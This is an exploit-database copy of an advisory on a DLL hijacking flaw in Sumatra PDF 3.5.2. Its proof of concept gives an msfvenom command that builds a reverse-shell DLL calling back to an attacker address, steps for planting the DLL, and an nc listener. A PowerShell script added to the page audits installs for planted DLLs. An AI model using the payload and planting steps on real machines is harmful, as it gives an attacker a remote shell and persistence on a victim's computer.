Sumatra PDF 3.5.2 DLL Hijacking

CVE: CVE-2024-24528
Category: CWE-427 (Uncontrolled Search Path Element)
Price: $5,000
Severity: High
Author: Exploit Alert Team
Risk: High
Exploitation Type: Local
Date: 2024-02-06
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
(Note: the AV:N component of the vector as listed is at odds with the Local exploitation type given above; the attack described below requires write access to the local installation directory.)

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020032

Below is a copy:

# Exploit Title: Sumatra PDF 3.5.2 DLL Hijacking
# Date: 06.02.2024
# Exploit Author: Ravishanka Silva
# Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader
# Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer
# Version: 3.5.2
# Tested on: Windows 10, Windows 11
# CVE : CVE-2024-24528

Description:
Sumatra PDF is a free and open-source document viewer for Windows. It is a lightweight and minimalistic application designed to quickly and efficiently view PDF, eBook (ePub, Mobi), XPS, DjVu, CHM, and comic book (CBZ and CBR) files.
Key features of Sumatra PDF include its fast startup and rendering speed, support for a variety of document formats, and a user-friendly interface. While it may not have all the advanced features found in some other PDF viewers, Sumatra PDF is a popular choice for users who prioritize speed and simplicity in a document viewer.

A DLL hijacking vulnerability exists in Sumatra PDF 3.5.2 that allows a local attacker to execute arbitrary code, and to persist on the compromised host, in the context of the currently logged-in user by placing a crafted DLL in the installation directory. The application resolves the following DLLs from its own directory before the Windows system directories, so each of them can be hijacked:
dbgcore.DLL
profapi.dll
PROPSYS.dll
TextShaping.dll
DWrite.dll

Because the default installation directory lives under the user's own profile (see the proof of concept below), no elevated privileges are needed to plant the DLL; by the same token the hijacked code runs only with that user's rights, so the issue yields persistence rather than privilege escalation.

Proof of Concept:

1. Create a malicious .dll file via msfvenom,
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o dbgcore.DLL

2. Place the malicious DLL inside the Sumatra PDF installation folder. (Usually "C:\Users\<username>\AppData\Local\SumatraPDF")

3. Start a listener via nc,
nc -lvp 7777

4. Open Sumatra PDF application, and observe the execution of the reverse shell.
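The following PowerShell script is an added example, not part of the original advisory, showing how a defender or tester can check a host for this hijack: it audits the Sumatra PDF install directory for the five DLL names listed above (all of them are Windows system libraries normally loaded from System32, so any copy sitting in the install directory is suspect), reports signature status and whether the file matches the System32 copy, and, if SumatraPDF is running, lists which loaded modules were resolved from the install directory instead. The default path is the per-user location named in the advisory; the assumption that a clean install contains no DLLs of its own is an assumption, not something the advisory states.

```powershell
# Added example (not from the advisory): audit a SumatraPDF install directory for
# planted copies of the hijackable DLLs and verify what a running instance loaded.
param(
    # Default per-user install directory from the advisory; override for other installs.
    [string]$InstallDir = (Join-Path $env:LOCALAPPDATA 'SumatraPDF')
)

# DLL names the advisory reports as hijackable. All are Windows system libraries
# that should be resolved from System32, so a copy in the install directory is suspect.
$HijackableDlls = @('dbgcore.dll', 'profapi.dll', 'propsys.dll', 'TextShaping.dll', 'DWrite.dll')
$System32 = Join-Path $env:SystemRoot 'System32'

function Test-SumatraDllHijack {
    param([string]$Dir, [string[]]$Names)

    foreach ($name in $Names) {
        $candidate = Join-Path $Dir $name
        if (-not (Test-Path -LiteralPath $candidate)) { continue }

        # A msfvenom-generated DLL will show as NotSigned; a copied system DLL
        # would be Valid but still out of place.
        $sig  = Get-AuthenticodeSignature -FilePath $candidate
        $hash = (Get-FileHash -LiteralPath $candidate -Algorithm SHA256).Hash

        $sysCopy = Join-Path $System32 $name
        $sysHash = $null
        if (Test-Path -LiteralPath $sysCopy) {
            $sysHash = (Get-FileHash -LiteralPath $sysCopy -Algorithm SHA256).Hash
        }

        [pscustomobject]@{
            Dll             = $name
            Path            = $candidate
            SignatureStatus = $sig.Status
            Signer          = $sig.SignerCertificate.Subject
            MatchesSystem32 = ($null -ne $sysHash -and $hash -eq $sysHash)
            SHA256          = $hash
        }
    }
}

function Get-SumatraModulesFromInstallDir {
    param([string]$Dir)
    # Modules of a running SumatraPDF whose on-disk path is inside the install
    # directory. Assumption: a clean install ships no DLLs of its own, so only
    # SumatraPDF.exe itself should normally appear here.
    Get-Process -Name SumatraPDF -ErrorAction SilentlyContinue |
        ForEach-Object { $_.Modules } |
        Where-Object { $_.FileName -like (Join-Path $Dir '*') } |
        Select-Object ModuleName, FileName
}

$findings = @(Test-SumatraDllHijack -Dir $InstallDir -Names $HijackableDlls)
if ($findings.Count -eq 0) {
    Write-Host "No hijackable DLL names present in $InstallDir"
} else {
    Write-Warning "Found $($findings.Count) planted DLL candidate(s) in $InstallDir"
    $findings | Format-Table -AutoSize
}

# Run this part after launching Sumatra PDF to confirm which modules the process
# actually resolved from the install directory.
Get-SumatraModulesFromInstallDir -Dir $InstallDir | Format-Table -AutoSize
```

Run it from the affected user's session (the install directory is per-user, so another account may not see it), before and after step 4 above; the second table is what confirms that the planted DLL was loaded by the process rather than merely sitting on disk.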

Demo:
https://drive.google.com/file/d/1-OMJ0ZvR9TYJEg_AwspRcGEAQvOLHJ41/view?usp=sharing

Copyright ©2024 Exploitalert.
